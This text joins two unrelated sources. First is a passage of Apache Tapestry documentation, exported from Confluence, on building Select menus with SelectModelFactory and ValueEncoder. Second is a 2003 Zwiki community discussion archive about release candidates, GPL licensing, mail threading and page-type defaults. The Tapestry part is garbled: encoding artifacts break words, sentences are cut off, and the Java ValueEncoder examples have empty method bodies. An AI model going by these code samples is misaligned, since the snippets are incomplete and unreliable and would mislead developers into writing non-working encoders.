Message-ID: <1775132139.72489.1560663635628.JavaMail.confluence@cwiki-vm5.apache.org> Subject: Exported From Confluence MIME-Version: 1.0 Content-Type: multipart/related; boundary="----=_Part_72488_848912822.1560663635627" ------=_Part_72488_848912822.1560663635627 Content-Type: text/html; charset=UTF-8 Content-Transfer-Encoding: quoted-printable Content-Location:
The documentation for the Select Component and the Tapestry Tutorial provide simpl= istic examples of populating a drop-down menu (as the (X)HTML Select element) using comma-delimited strings and enums. However, most real-wor= ld Tapestry applications need to populate such menus using values from a da= tabase, commonly in the form of java.util.List objects. Doing so generally = requires a Selec= tModel and a ValueEncoder bound to the Select component with its "model" and "enco= der" parameters:
<t:select = t:id=3D"colorMenu" value=3D"selectedColor" model=3D"ColorSelectModel" encod= er=3D"colorEncoder" />=20
In the above example, ColorSelectModel must be of type SelectModel, or a= nything that Tapestry knows how to coerce into a SelectModel, such as a List or a= Map or a "value=3Dlabel,value=3Dlabel,..." delimited string, or anything T= apestry knows how to coerce into a List or Map, such as an Array or a comma= -delimited String.
If you provide a property of type List for the "model" parameter, Tapest= ry automatically builds a SelectModel that uses each object's toString() fo= r both the select option value and the select option label. For database-de= rrived lists this is rarely useful, however, since after form submission yo= jus= t for this purpose, you may as well let Tapestry do it for you, using Selec= tModelFactory.
To have Tapestry create a SelectModel for you, use the SelectModelFactor= y service. SelectModelFactory creates a SelectModel from a List of obje= cts (of whatever type) and a label property name that you choose:
@Property private SelectModel colorSelectModel; @Inject SelectModelFactory selectModelFactory; ... void setupRender() { // invoke my service to find all colors, e.g. in the database List<Color> colors =3D colorService.findAll(); // create a SelectModel from my list of colors colorSelectModel =3D selectModelFactory.create(colors, "name"); }=20
The resulting SelectModel has a selectable option (specifically, an Opti= onModel) for every object in the original List. The label property name (th= e "name" property, in this example) determines the user-visible text of eac= h menu option, and your ValueEncoder's toClient() method provides the encod= ed value (most commonly a simple number). If you don't provide a ValueEncod= er, the result of the objects' toString() method (Color#toString() in this = example) is used. Although not a recommended practice, you could s= et your toString() to return the object's ID for this purpose:
... @Override public String toString() { return String.valueOf(this.getId());=20 }=20
But that is contorting the purpose of the toString() method, and if you = go to that much trouble you're already half way to the recommended practice= : creating a ValueEncoder.
In addition to a SelectModel, your Select menu is likely to need a Value= Encoder. While a SelectModel is concerned only with how to construct a Sele= ct menu, a ValueEncoder is used when constructing the Select menu and= em> when interpreting the encoded value that is submitted back to the serve= r. A ValueEncoder is a converter between the type of objects you want to re= present as options in the menu and the client-side encoded values that uniq= uely identify them, and vice-versa.Most commonly, your ValueEncoder's toClient() method will return a un= ique ID (e.g. a database primary key, or perhaps a UUID) of the given objec= t, and its toValue() method will return the=20 object matching the given ID by doing a database lookup (ideally u= sing a service or DAO method).
If you're using one of the ORM integration modules (Tapestry-Hibernate, Tapestry-JPA, or Tapestry-Cayenne), the ValueEncoder is autom= atically provided for each of your mapped entity classes. The Hibernate mod= ule's implementation is typical: the primary key field of the object (conve= rted to a String) is used as the client-side value, and that same primary k= ey is used to look up the selected object.
That's exactly what you should do in your own ValueEncoders too:
public class = ColorEncoder implements ValueEncoder<Color>, ValueEncoderFactory<C= olor> {=20 @Inject private ColorService colorService; } // let this ValueEncoder also serve as a ValueEncoderFactory @Override public ValueEncoder<Color> create(Class<Color> type) { return this;=20 } }=20=20
Alternatively, if you don't expect to need a particular ValueEncoder mor= e than once in your app, you might want to just create it on demand, using = an anonymous inner class, from the getter method in the component class whe= re it is needed. For example:
. . . public ValueEncoder<Color> getColorEncoder() { return new ValueEncoder<Color>() { } };=20 }=20
Notice that the body of this anonymous inner class is the same as the bo=
dy of the ColorEncoder top level class, except that we don't need a
c=
reate method.
If your ValueEncoder implements ValueEncoderFactory (as the Col= orEncoder top level class does, above), you can associate your custom Value= Encoder with your entity class so that Tapestry will automatically use it e= very time a ValueEncoder is needed for items of that type (such as with the= Select, RadioGroup, Grid, Hidden and AjaxFormLoop components). Just add li= nes like the following to your module class (usually AppModule.java):
... public static void contributeValueEncoderSource(MappedConfiguration<= Class<Color>, ValueEncoderFactory<Color>> configuration)= {=20 configuration.addInstance(Color.class, ColorEncoder.class); }=20
If you are contributing more than one ValueEncoder, you'll have to use r= aw types, like this:
... public static void contributeValueEncoderSource(MappedConfiguration<= Class, ValueEncoderFactory> configuration) { configuration.addInstance(Color.class, ColorEncoder.class); configuration.addInstance(SomeOtherType.class, SomeOtherTypeEncoder= .class); }=20
The Select component's "encoder" parameter is optional, but if the "valu= e" parameter is bound to a complex object (not a simple String, Integer, et= c.) and you don't provide a ValueEncoder with the "encoder" parameter (and = one isn't provided automatically by, for example, the Tapestry Hibernate in= tegration), you'll receive a "Could not find a coercion" exception (when yo= u submit the form) as Tapestry tries to convert the selected option's encod= ed value back to the object in your Select's "value" parameter. To= fix this, you'll either have to 1) provide a ValueEncoder, 2) provide a Coercion, or 3) us= e a simple value (String, Integer, etc.) for your Select's "value" paramete= r, and then you'll have to add logic in the corresponding onSuccess event l= istener method:
<t:select = t:id=3D"colorMenu" value=3D"selectedColorId" model=3D"ColorSelectModel" /&g= t;=20
... public void onSuccessFromMyForm() { // look up the color object from the ID selected =09selectedColor =3D colorService.findById(selectedColorId); =09... }=20
But then again, you may as well create a ValueEncoder instead.
Actually, it's really pretty easy if you follow the examples above. But = why is Tapestry designed to use SelectModels and ValueEncoders anyway? Well= , in short, this design allows you to avoid storing (via @Persist, @Session= Attribute or @SessionState) the entire (potentially large) list of objects = in the session or rebuilding the whole list of objects again (though only o= ne is needed) when the form is submitted. The chief benefits are reduced me= mory use and more scalable clustering due to having far less HTTP session data= to replicate across the nodes of a cluster. | https://cwiki.apache.org/confluence/exportword?pageId=26804691 | CC-MAIN-2019-26 | en | refinedweb |
Archived GeneralDiscussion.
catalog hiccup --Simon Michael, Mon, 01 Sep 2003 10:12:20 -0700 reply
Should be fixed now.
0.22rc4 released --simon, Mon, 01 Sep 2003 10:33:41 -0700 reply
With two fixes.. 0.22 will be deferred until at least tomorrow.
- experimental skin implementations: use "searchwiki" not "search" to avoid cmf/plone clash (IssueNo0593?)
- tracker: use Title not title_or_id in IssueTracker, FilterIssues
happy labour day --simon, Mon, 01 Sep 2003 10:56:57 -0700 reply
It's labour day here in the US.. happy labour day.
Something cool and non zwiki-related I want to share with you. Here in Santa Monica, the ocean has been very brown the last couple of days. A friend told me it's a "red tide", where plankton (algae ?) are blooming heavily. And they're bio-luminescent! So I went down there last night after sunset to see. Sure enough, as it got dark the surf began to glow with an electric light. Superb! It only glowed when the waves first broke, though - then it was covered up by murky foam. Splashing about in the shallows had no effect. Rats. The water felt inviting, so I swam out to where it was glowing. Swimming along, my fingers trailed light like comets, and all around me the water lit up. Magic! A couple of shooting stars zapped away - little fish! If you're in the neighbourhood, try it!
... -- Tue, 02 Sep 2003 02:22:11 ?
Thanks, Volker
zwiki.org error --FlorianKonnertz, Tue, 02 Sep 2003 08:50:39 -0700 reply
Just got an error when renaming a page:
* Module ZPublisher.Publish, line 150, in publish_module * Module Products.Localizer, line 58, in new_publish *.ZWikiPage, line 1595, in rename AttributeError
installing default pages in plone --Simon Michael, Tue, 02 Sep 2003 11:54:27 ?
Hi Volker, here is the easiest way to get the default zwiki pages in plone at the moment: use the ZMI to add a zwiki web outside of plone and cut and paste the pages from there into your plone folder.
This will also install the standard DTML-based pages RecentChanges?, SearchPage? and UserOptions?. But as of zwiki 0.22, these won't work in plone by default ("Evil Limi" has decreed "no DTML in plone wikis by default"). You can do one of two things here:
- re-enable DTML by default, by deleting the file ZWiki/zwiki_plone/no_dtml.dtml on the filesystem.
- use the experimental skin-based implementations included in 0.22, which don't require that your wiki be DTML-enabled. These aren't ready. But they work and you can customize their appearance, so.. to use them, just provide links to FrontPage/recentchanges and FrontPage/searchwiki (searches only the current wiki, unlike the plone search form). useroptions doesn't do anything in cmf/plone so ignore that one.
This is all in flux. I think we should add a /setupDefaultPages method to install these, and do away with the ZMI "add zwiki web" option. As usual, help is welcome, I'd like to work on this but don't know just how soon that will be.
Re: IssueTracker --Simon Michael, Tue, 02 Sep 2003 11:59:48 -0700 reply
"Woellert, Kirk D." <kirk.woellert@ngc.com> writes:
Thank you, Thank you, thank you! I renamed the no_dtml.dtml file as you suggested. I don't see the screen shot page anymore. I get this error. I used the auto setup script so my catalog should arlready be made right?
Site error This site encountered an error trying to fulfill your request. The errors were:
Error Details Error Type CatalogError? Error Value Unknown sort_on index
Hi Kirk - that setup script was not maintained and needs an update by the looks of things. I hope to incorporate it soon, but I don't know when that will be, funded work must take precedence right now. sort_on should be an argument it passes to the catalog, not an index. Sorry I can't be more help right now.
I tried posting to the discussion page again, but "add a comment" does not seem to work. The web browswer just times out, and the page is rendered again just as it was before clicking the tab.
That's odd. Posting to GeneralDiscussion when it's large does take a long time (less than a minute.. ?). See if you can post on shorter pages.
zwiki.org error --SimonMichael, Tue, 02 Sep 2003 12:25:42 -0700 reply
Hi Florian. Can you reproduce it ? Can I ? If not, what page were you renaming ? Thanks
... -- Tue, 02 Sep 2003 13:15:53 -0700 reply
The RecentChanges? page shows dates running four days behind (August 29 instead of September 2)
0.22rc5 released --SimonMichael, Tue, 02 Sep 2003 13:21:07 -0700 reply
Bake 0.22 a little longer. Latest fixes:
- use Title instead of title_or_id in default backlinks templates
- use the now-preferred Title attribute in pageNames(), and include it in the page brains returned by pages()
zwiki.org error --FlorianKonnertz, Wed, 03 Sep 2003 04:14:12 -0700 reply
I tried to rename WikiAnwendungbeireiche? to WikiAnwendungbereiche?, which already exists - but i reproduced it by renaming to WikiAnwendungbereicheGruende?
zwiki.org error --FlorianKonnertz, Wed, 03 Sep 2003 04:16:19 -0700 reply
Err, WikiAnwendungbereiche? does not exist, this was wrong, sorry. But anyway... already an idea?
How to display a link to log in --Kurt Yoder, Wed, 03 Sep 2003 14:36:19 -0700 reply
Simon Michael said:
Ah, very good. Yes, all you need is to make a link to the login form appear, only when not logged in. Such a code snippet should be easy to find with a little searching. It's something along the lines of:<span tal: <a href="login_form">log in</a> to edit this page </span>
You'll add this to your Zwiki skin, most likely, by customizing it. I don't know if you've found out how to customize skins yet. Eg if you're in CMF/Plone, go to portal_skins/zwiki_plone/wikipage_view and click customize..
Thanks for your help!
-- Kurt Yoder Sport & Health network administrator
RemoteWikiLinks --DeanGoodmanson, Wed, 03 Sep 2003 14:52:46 -0700 reply
Again noticed that the target has to be more than one character. ZWiki:Z vs. ZWiki:ZWiki Got bit by building a link to an indexed query, and MyExample:1 failed. For the time being MyExample:1/ works just fine. I'll need to dig more at the regex to understand it...a few minutes wasn't enough. Hmm..ISBN #1? BookLookup:1\ BookLookup:01
Aside from that the general use is a WikiName as the target from the remote link, is there any other reasons why 1 character might be invalid?
removing last edited tooltip --DeanGoodmanson, Wed, 03 Sep 2003 14:58:21 -0700 reply
As I've put off upgrading long enough to merit a multi-hour upgrade, I'd like to quickly remove the "last edited ..." tool tips in order for a short-term speed increase stop-gap. Found that a few RecentChanges? on the main pages and backlinks on every page are helpful, but as Simon pointed earlier, that causes each page to be awoken.
I skimmed through some recent RC code, along with my existing 0.17.0 site, for a spot to comment out that call, but none stuck out as an easy 1 or two point snip. Smelled like
linktitle...
Is there a one or two position cut-point to remove the tool-tip feature from my older version?
zwiki.org error --Simon Michael, Wed, 03 Sep 2003 20:36:52 -0700 reply
Thanks, followed up on IssueNo0597?
new Search idea - canonicalLinks --BillSeitz, Fri, 05 Sep 2003 09:36:54 -0700 reply
Avoid having to index full text?
removing last edited tooltip --BillSeitz, Fri, 05 Sep 2003 09:39:49 -0700 reply
I just did this on my codebase yesterday (not rolled out yet). I found that if I just changed the default argument value in _renderLink() to render_title=0, it worked.
new Search idea - canonicalLinks --BillSeitz, Fri, 05 Sep 2003 09:45:46 -0700 reply
to clarify my overly-terse post:
- the "default" Catalog spec includes canonicalLinks, but not the full text
- canonicalLinks includes all WikiName-s in a body, even for pages that don't exist
- if you obsessively write in WikiName-s, then that catches a lot
From julien Motch sept 5
Subject : Can not edit Zwiki pages when logged in as manager
Hi, I have just installed Zwiki 0.21 with Zope 2.6.1. To test it, +I+ create a Zwiki web without any problem. But when I click on the view link, no edits links appear at the bottom of the page althought I am logged as manager and I can do all what a manager is able to do in the zope system.
If I want to edit the wiki pages, I have to give edit capabilities to anonymous users. Nothing else is working.
Any idea about the problemorigin ?
... -- Sat, 06 Sep 2003 16:51:35 -0700 reply
Have you given "change page type" to anonymous users?
date formatting oddity --DeanGoodmanson, Mon, 08 Sep 2003 08:24:41 -0700 reply
The dates in the messages weren't formatted on my home XP Zope2.7.1 box as they are on Zwiki. Examples at DeanG. Any thoughts?
I wanted to test it through the Zope python prompt, but I haven't done that much as couldn't find the "ZopeTime?" method. >:-/ (Gentoo should be in the mail this week! :-))
... -- Tue, 09 Sep 2003 05:08:07 -0700 reply
To improve Zwiki, drop the GPL -- Tue, 09 Sep 2003 05:24:43 -0700 reply
After a few edits, my message was getting big, so instead of clogging up this page, I moved it to:
Please take a look. I am raising money to fund continuous development of a public domain Zope wiki product, but was hoping not to have to start from scratch. The above linked document explains my reasoning and my passion to make this happen. I also address the below concerns. I may be crazy, but I REALLY believe in the potential of this software.
Way to go, Simon! I can't wait to talk to you. I'll try to contact you tomorrow night after I get back to San Diego. Meanwhile, I am n_johnson@yahoo.com but my company firewall won't let me access mail.yahoo.com so I'll get email tomorrow.
Nate
To improve Zwiki, keep the GPL --TonyRossini, Tue, 09 Sep 2003 07:33:13 -0700 reply
I hope that the zwiki community would consider keeping the GPL. There is no particular reason that changing licenses would speed up the development process; I do not see a mass of developers looking at jumping in and helping just because the license changes, nor any reason for those folks to give back. As one who is working on putting together $$ for Simon for consulting (working through university purchasing/contract systems is taking MUCH (months) longer than I thought, no Simon, I've not changed my mind, just havn't had time to plow through the bureaucracy), I'd hope that it remains GPL. Or at least LGPL.
To improve Zwiki, keep the GPL --DeanGoodmanson, Tue, 09 Sep 2003 08:41:16 -0700 reply
More information for the topic...
TWiki is GPL. TWiki:GnuGeneralPublicLicense , I thought the WikiWiki was, but I can't seem to find that. Plone is GPL.
quick update --Simon Michael, Tue, 09 Sep 2003 13:02:09 -0700 reply
Good day all.. 0.22 is bogged down with CVS confusion right now. I lost track of things I wanted to merge from the trunk and things I didn't, exacerbated by pcl-cvs and cvs weirdness. I can see it's time for a cleanup of my CVS & release process. I have been spread a bit thin and so am just taking this a step at a time. Will respond to questions here when I can. Veterans, thanks for stepping in. The recent bug reports have been excellent also, raising the quality of the 0.22 release.
Also feeling as if I may have dissed the community's work in the recent thread with Laura. If it came across that way, sorry. I tried to break through the veneer of politeness and stimulate clear discussion. Also I sometimes veer into soapbox mode and should make that clearer. If anyone's "at fault" for the state of zwiki docs, it's me. I've often felt unable to push this project forward as fast as I'd like. O well! Press on!
mail client change, mail list --Simon Michael, Tue, 09 Sep 2003 13:25:45 -0700 reply
In other news.. after a run of many years with emacs gnus, I've switched to one of these new-fangled GUI mail clients (the excellent Thunderbird). Big news for me :). All part of the quest for efficient reliable messaging.
I don't yet have the same feeling of fluidity/usability from the zwiki mail list/zwiki.org's wikimail that I do with other lists/newsgroups. I'm not sure why that is, any ideas ?
The recent threading fix should help, and now that my mail client is faster, as an experiment I'm going to try following discussion strictly by mail for a bit.
mail client change, mail list --Dean Goodmanson, Tue, 09 Sep 2003 13:37:04 -0700 reply
- Do you see who the individual emails are coming from? They don't show up in Outlook 2000.
- I rarely respond in email, this post is an experiment. Sometimes I'd like the "forwarded from" link to include the usability name
#bottomto get me to the comment, but, BUT.. lately then I scroll to the latest post to be sure to use the
reply. THUS.. I would prefer the forwarded from to include a message anchor. (which doesn't exist, but may add an "end" delimiter to the messages?)
--
forwarded from
change management thought --BillSeitz, Tue, 09 Sep 2003 14:07:22 -0700 reply
How about: every change has a related specific page (Issue or not), and thus every item in the ReleaseNotes points to the appropriate page.
The meta-principle involved: "control" changes by putting them through pre-documentation.
Is this an obnoxious idea?
cached BackLinks - custom tweak --BillSeitz, Tue, 09 Sep 2003 18:13:28 -0700 reply
see and give me some feedback.
0.22.0rc6 released --Simon Michael, Tue, 09 Sep 2003 20:09:38 -0700 reply
If all goes well 0.22 will follow late tomorrow. The ChangeLog? in the trunk and on this site is now generated with cvs2cl.
- support the STX :img: syntax, finally. (IssueNo0601?, etc.)
- subscribe() and unsubscribe() now redirect as they used to, ie back to the subscribe form, when there is no redirectURL argument (IssueNo0584?)
- the standard_page_type property for forcing new page types is no longer supported; use allowed_page_types instead.
- when unspecified, the type of new pages now defaults to the first of the wiki's allowed page types.
- make catalog() provide catalog with correct acquisition wrapper (IssueNo0597?)
- new catalogId() method returns id of the catalog in use, or NONE. Requires
Manage propertiespermission.
- getPath() is now supported
- ChangeLog? is no longer provided in releases for the moment, to simplify maintenance
0.22.0rc6 released -- Tue, 09 Sep 2003 21:46:14 -0700 reply
Had trouble finding the download. In the past I relied on the FrontPage links and your Zope page. Through OldFrontPage? figured out , so added the link to ReleaseNotes. Didn't in other places as I was looking for the pre-releases.
0.22.0rc6 released --Simon Michael, Tue, 09 Sep 2003 22:23:57 -0700 reply
You didn't see "NavigationAids has more links to downloads, documentation, etc" on FrontPage ?
I too miss the download link on FrontPage. Not sure how to put it there without duplication of effort and/or too much clutter.
0.22.0rc6 released -- Wed, 10 Sep 2003 00:01:20 -0700 reply
NavigationAids.. ahhARG! :-) Once again, I overlooked the obvious. Search hits on "download" were too many, rc6 nada, and "tarball" close but no link.
(If it's any consolidation, I couldn't find the license or download of WikiWiki after 5 minutes of searching and hitting login dialogs..)
0.22rc7 released --Simon Michael, Wed, 10 Sep 2003 14:36:56 -0700 reply
An inconsistency that need not see the light of day after all.
- backlinksFor() now always returns brain-like objects, like pages(). (IssueNo0604?, Magog)
Also, include page_url and linkTitle in PageBrains? to increase backwards compatibility with legacy backlinks templates. Old backlinks templates should now be fully supported except in this case: when there is a catalog with meta_type, path, and canonicalLinks indexes but without page_url and linkTitle metadata (unlikely).
Default page type -- Wed, 10 Sep 2003 20:36:28 -0700 reply
The current behaviour seems to be create new pages with the same type (selected by default in the type box) as the page they are created from. Of course the user can override this by then selecting another type. Is there any mechanism to force a wiki web to always have one particular type set as the default when the new page is created? allowed_page_types does not seem to have any effect here, it just controls which types are shown in the selection box.
Zwiki 0.22 released --Simon Michael, Wed, 10 Sep 2003 23:54:07 -0700 reply
Summary: Memory efficiency/performance/scalability improvements; simpler page types and DTML control; zwiki_plone and default skin updates; wikimail tweaks; STX images; bugs, fixes, features.
Quite a lot going on! Good luck. See and for download and details. I hope to sort out my zope.org publishing process soon.
I'm happy to announce that zope.org and plone.org are now using mainstream Zwiki. This is a big milestone. There have been a number of installation issues with the zope.org wikis but these are being addressed (thanks webmasters).
Also I think Zwiki may be coming up on it's 5th birthday around now..
Default page type --Simon Michael, Thu, 11 Sep 2003 00:34:09 ?
change management thought --Simon Michael, Thu, 11 Sep 2003 00:37:41 -0700 reply
BillSeitz wrote:
How about: every change has a related specific page (Issue or not), and thus every item in the ReleaseNotes points to the appropriate page.
That would be interesting, something like CVSTrac? perhaps. I'm most concerned with lightening my process right now though.
cached BackLinks - custom tweak --Simon Michael, Thu, 11 Sep 2003 00:39:26 -0700 reply
BillSeitz wrote:
see and
Hi Bill, I had a quick look - is it inline backlinks ? Those can work. Your backlinks form shouldn't be slow, perhaps 0.22 will help.
mail client change, mail list --Simon Michael, Thu, 11 Sep 2003 00:50:51 -0700 reply
Dean Goodmanson wrote:
1. Do you see who the individual emails are coming from? They don't show up in Outlook 2000.
Thunderbird showed that message as from Dean Goodmanson <zwiki-wiki@zwiki.org>. If Outlook has learned a fixed or blank real name for that zwiki-wiki@zwiki.org address, that might explain it.
Also that message didn't get threaded in my mail client. Did you reply to some old message (looks like 2003/09/01 ?) That would explain that.
the latest post to be sure to use the
reply. THUS.. I would prefer the forwarded from to include a message anchor. (which doesn't exist,
Eh ? Do you mean like the timestamp link
or the reply link
? I'd like to use those but it felt like just too much visual clutter.
To improve Zwiki, keep the GPL --Simon Michael, Thu, 11 Sep 2003 02:11:26 -0700 reply
reason for those folks to give back. As one who is working on putting together $$ for Simon for consulting (working through university purchasing/contract systems is taking MUCH (months) longer than I
Hey thanks.. I hope it works out.
So far, the longer I'm in this business, the more I value the GPL. Squeak's licensing quagmire and the recent assault on GNU/Linux are two of the latest inputs.
I do have a problem which I've being thinking about quite a bit. Since the topic has come up I'll just put my current thinking out there..
I would like maximum sharing and reuse of Zwiki code in the Zope 3 project. I'd like Zwiki for zope 3 to be in the zope 3 cvs repository and I'd like all Zwiki code to be freely reusable in zope-3-zwiki and any other parts of Zope 3. But for now and the foreseeable future the zope 3 cvs repository, and the zope 3 project generally, accepts only ZPL code.
I'm the Zwiki copyright holder, so technically the license can be changed to whatever. Though past and potential future developers may have their own feelings about a license change. Some come because we are GPL, and vice versa.
GPL gives maximum protection against the unlikely-but-always-possible legal shenanigans that can be pulled if it ever becomes in anyone's interest to do so. I'm almost, but not quite convinced it's sensible to give this up.
I've thought of ZPLing? the whole thing. The ZPL seems to be both a license and a copyright transfer to "Zope corp. and contributors". I think the copyright assignment is required. So this would be a one-way deal, zwiki code developed in the zope 3 project would stay ZPL forever (unless Zope corp. and contributors agreed on a change.). Because of this I am not being hasty.
Dual licensing GPL/ZPL is possible, but I've heard there's not much point in that - it's essentially the same as abandoning the GPL. Though I'm not sure I completely agree with that.
Another option is to stay "almost GPL" - GPL with an exception for the zope 3 project. "This code is under GPL, except you may reuse any parts of it which are useful for the zope 3 project under the ZPL; the original Zwiki for zope 2 collected work remains under GPL and (c) SM". A tad murky but I think it could work fine. Technically someone could grab the entire codebase and use under ZPL right away but there would be at least a little extra social cost in doing this. Zwiki for zope 2 keeps at least some flavour of being a GPL project. In some ways this is the simplest thing that could possible work, as in "most incremental and least disruptive option".
And of course just sticking with the GPL is an option. Those zope 3 guys can write anything they need pretty quick with or without Zwiki - in fact Zwiki for zope 3 may be more of a rewrite than a port - but there would be at least some wasteful duplication of effort. And since they're unlikely to come and play in the GPL world soon, I probably wouldn't get to play with them so much.
That's where I'm at. Moving to a "weaker" license is a one way move, so as I said I'm mulling it over in a leisurely way.
To improve Zwiki, keep the GPL --Simon Michael, Thu, 11 Sep 2003 02:16:56 -0700 reply
TonyRossini wrote:
is no particular reason that changing licenses would speed up the development process; I do not see a mass of developers looking at jumping in and helping just because the license changes, nor any reason for those folks to give back. As one who is working on putting
Actually I think choice of license is an important factor in attracting developers' time and attention.
Default page type -- Thu, 11 Sep 2003 06:24:40 ?
I want to strongly encourage it, by setting it as the default, but I do still want to show the other page types, otherwise people will never even know about them, and sometimes they are useful. The problem this makes sense for a lot of wikis. For example, I want to encourage pages to be done using reStructuredText. But anybody who creates a page off of FrontPage will get a new page which by default is set to StructuredText (assuming it is the default FrontPage). Personally, I think one way it could work is that the default page type could be the first item on allowed_page_types, and maybe you could have ano option to also work in the current style (default page type is the same as the page you are creating off).
-Colin
mail client change, mail list --DeanGoodmanson, Thu, 11 Sep 2003 07:20:56 -0700 reply
Eh ? Do you mean like the timestamp link
Yes. :-) I overlooked that. I agree that it is a long URL, but it does ID the source of the message, which may justify including it in the mail-out.
Thunderbird showed that message as from Dean Goodmanson .
An example of the mail header's FROM lines, the Zwiki doesn't include the senders name in Outlook, where the Yahoo one does:
Zwiki mail: From: zwiki-wiki@zwiki.org (Simon Michael) Yahoo mail: From: Dean Goodmanson <goodmansond@yahoo.com>
Note: When getting messages from Zwiki in my yahoo account, the From name shows up! :-)
This issue may be another case of using a non-standard to accomodate the majority. :-/
Default page type --Simon Michael, Thu, 11 Sep 2003 11:07:39 -0700 reply
Oh, by the way (time machine whirrs) I agree and dropped this - in 0.22 create() reads:
# set the specified page type, otherwise use this wiki's default p.page_type = type or self.defaultPageType()
ie we no longer inherit type from the parent. I don't think that behaviour is necessary.
> think one way it could work is that the default page type could be the > first item on allowed_page_types, and maybe you could have ano option
Good idea.. (whirr) defaultPageType() is the first of the allowedPageTypes().
ALL_PAGE_TYPES is another useful attribute. With these three it should be possible to show whatever you want in the edit form. Maybe a list of radio buttons with the disallowed ones disabled ?
mail client change, mail list --Simon Michael, Thu, 11 Sep 2003 12:03:30 -0700 reply
ONE. As you probably know, when you post via the web the from address will be zwiki-wiki@zwiki.org and the real name will be your (cookie or authenticated) username. Ie normally something like:
From: zwiki-wiki@zwiki.org (DeanGoodmanson)
Your last message () was like this. In this case your mail client should show at least "DeanGoodmanson". But because it has seen zwiki-wiki@zwiki.org before with other real names attached, it might not. Without knowing Outlook I can't say more.
TWO. When you post via mail - assuming the wiki uses the
mail_replyto
property as we do, and not
mail_from - your real from should come
through, eg:
From: Dean Goodmanson <your@real.address>
Your previous message () should have been like this, but actually it came through as:
From: Dean Goodmanson <zwiki-wiki@zwiki.org>
(You can examine these messages in the gmane newsgroup if needed.) That's odd. Dumb questions:
- I assume your Outlook is not sending out mail with that from address ?
- To generate this message, did you reply to something, or did you compose a new message ? I think the latter, since I see zwiki.org's auto-in-reply-to kicking in, threading it under 20030901103341-0700@zwiki.org, the first GeneralDiscussion post of the month.
- Did you send to zwiki@zwiki.org (recommended for wiki subscribers) or zwiki-wiki@zwiki.org (necessary for page subscribers) ?
mail client change, mail list --Simon Michael, Thu, 11 Sep 2003 12:06:54 -0700 reply
PS, what I wrote above may not apply exactly for page subscribers. It's how things appeared to a wiki (mailing list) subscriber. Tricky isn't it.
RemoteWikiLinks --Simon Michael, Thu, 11 Sep 2003 16:00:23 -0700 reply
Aside from that the general use is a WikiName as the target from the remote link, is there any other reasons why 1 character might be invalid?
It's not intentional. but a consequence of the way we require the interwikilink regexp to end on an alphanumeric character (for some forgotten bug report):
interwikilink = r'!?((?P<local>%s):(?P<remote>%s))' \ % (localwikilink, urlchars+urlendchar)
How to display a link to log in --Simon Michael, Thu, 11 Sep 2003 16:14:25 -0700 reply
Kurt Yoder wrote:.
Hi Kurt.. yes I did assume you were already using CMF..
... --Simon Michael, Thu, 11 Sep 2003 16:25:38 -0700 reply
The RecentChanges? page shows dates running four days behind (August 29 instead of September 2)
I didn't see this.. I haven't messed with the catalog lately and I'm assuming it's resolved now.
mail tip, threading --Simon Michael, Thu, 11 Sep 2003 18:40:52 -0700 reply
A newsreader with fast message searching (Thunderbird) plus the gmane news server works really well for finding and reading old messages in context, from zwiki.org, the zope lists, or whatever. You may need to unsubscribe and resubscribe the group to download all the message headers.
Auto-in-reply-to: this is the experimental feature activated on this site a few weeks ago, which tries to group posts into one thread per page per month. This is sort of nice when you come to read old mailman archives - you can see the effect in the september and late august mailman threaded archive. On the other hand it distorts posters' expressed threading intent slightly, and makes recent posts/threads a little harder to spot in mailman or newsreaders. I'll leave it on for the rest of september and compare october without it.
RemoteWikiLinks -- Thu, 11 Sep 2003 18:56:48 -0700 reply
we require the interwikilink regexp to end on an alphanumeric character (for some forgotten bug report):
Ahh, I see. I wish I could think of an example to override the general case of avoiding a space before punctuation, but I can't, so will keep the general consensus.
Strangely enough, I had noted that as a limitation on the RemoteWikiLinks page, and now have changed it to note that the target page (is that the correct term?) must be alphanumeric.
We may want to keep an eye out for cases where this should be expanded, such as Purple Number references: ZWiki:PurpleNumbers#nid1279 (<-- n/m!! It must end in an alphanumeric or
/.) - DeanG
RemoteWikiLinks --Simon Michael, Thu, 11 Sep 2003 19:30:19 -0700 reply
Actually, it's only the last character of the url that has to be alphanumeric (or /). As you say, it was probably to allow a trailing period or colon after a url, without intervening space. Note that this is done only with remote wiki urls, where you don't need it. It's not done with bare urls (maybe it was once).
It's problematic anyhow, because urls ending in . are legal I believe and should be recognized. There's a consensus that urls in plain text should always have a trailing space to avoid this problem.
So I think I'll drop this url_endchar thing.
mail tip, threading --Simon Michael, Thu, 11 Sep 2003 19:33:13 -0700 reply
The gmane group is also great if you want to reply to an old message in your mail/news client, but have deleted the mail.
mail client change, mail list --Simon Michael, Thu, 11 Sep 2003 19:41:40 -0700 reply
it is a long URL, but it does ID the source of the message, which may justify including it in the mail-out.
Agreed, it is too useful to leave out.
How to display a link to log in --Kurt Yoder, Fri, 12 Sep 2003 06:17:35 -0700 reply
Simon Michael said:.
OK, thanks for the information. I will look into this. Do you happen to know if it works with the Zope ldap authentication module also?
BTW, the mail-to-wiki code seems to have trouble with the email "quote" characters. It seems to want to wrap the line at strange places and/or not put the > at the beginning of the line. Just an observation.
-- Kurt Yoder Sport & Health network administrator
How to display a link to log in --Simon Michael, Fri, 12 Sep 2003 11:00:23 -0700 reply
OK, thanks for the information. I will look into this. Do you happen to know if it works with the Zope ldap authentication module also?
Yes, some solutions do.. check the products that end in
UserFolder.
BTW, the mail-to-wiki code seems to have trouble with the email "quote" characters. It seems to want to wrap the line at strange places and/or not put the > at the beginning of the line. Just an observation.
Can you tell how to reproduce this ? Are you seeing the strangeness in email, on the page, or both ?
strange automatic renaming --FlorianKonnertz, Fri, 12 Sep 2003 11:18:04 -0700 reply
Really strange things happen in my wiki - when i edited a page the late character from the title was cut and after saving and adding the title again the id was set to the same string. :-p Ever heard of that?? - I wonder if someone hacks my site... - Florian
strange automatic renaming --Simon Michael, Fri, 12 Sep 2003 11:29:06 -0700 reply
What was the title (page name) ?
new setup methods for catalog, tracker, default pages --SimonMichael, Sat, 13 Sep 2003 00:47:03 -0700 reply
I've incorporated the SetupIssueTracker? script (who wrote that ?) as /setupCatalog and /setupTracker in cvs. They add catalog fields as described on ZwikiAndZCatalog, when needed; they are safe to run more than once. See Admin.py for more detail.
There's also a /setupPages (installs default pages) and /setupDtmlMethods
(installs index_html and standard_error_message, probably only for non-CMF sites).
All of these pass tests, but could use some real-world testing.
They require
Manage properties permission (on the page where you run them..
ie be a manager).
new setup methods for catalog, tracker, default pages --SimonMichael, Sat, 13 Sep 2003 00:50:09 -0700 reply
